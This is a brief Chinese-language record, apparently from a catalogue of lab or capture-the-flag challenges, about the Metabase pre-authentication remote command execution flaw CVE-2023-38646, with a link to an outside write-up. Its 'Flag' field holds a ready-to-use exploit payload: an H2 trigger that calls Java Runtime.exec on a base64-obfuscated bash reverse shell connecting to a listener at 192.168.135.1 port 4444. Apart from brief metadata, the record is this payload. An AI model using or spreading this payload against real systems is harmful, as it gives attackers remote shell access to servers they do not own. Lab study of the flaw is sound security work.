| ID: | 14437 |
|---|---|
| 标题: | CVE-2023-38646 |
| 描述: | Metabase,一款流行的商业智能和数据可视化工具,被发现存在严重的安全漏洞,即CVE-2023-38646,允许攻击者在无需身份验证的情况下执行服务器级命令。 |
| 类型: | WEB |
| 网站: | 春秋云境 |
| 题目链接: | https://yunjing.ichunqiu.com/cvefree |
| 赛事: | 春秋云境 |
| 年度: | None |
| Flag值: | CREATE TRIGGER hhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS '//javascript java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xLzQ0NDQgMD4mMQ==} |
| writeup: |
{base64,-d} {bash,-i}")' https://blog.csdn.net/m0_46699477/article/details/131985102 |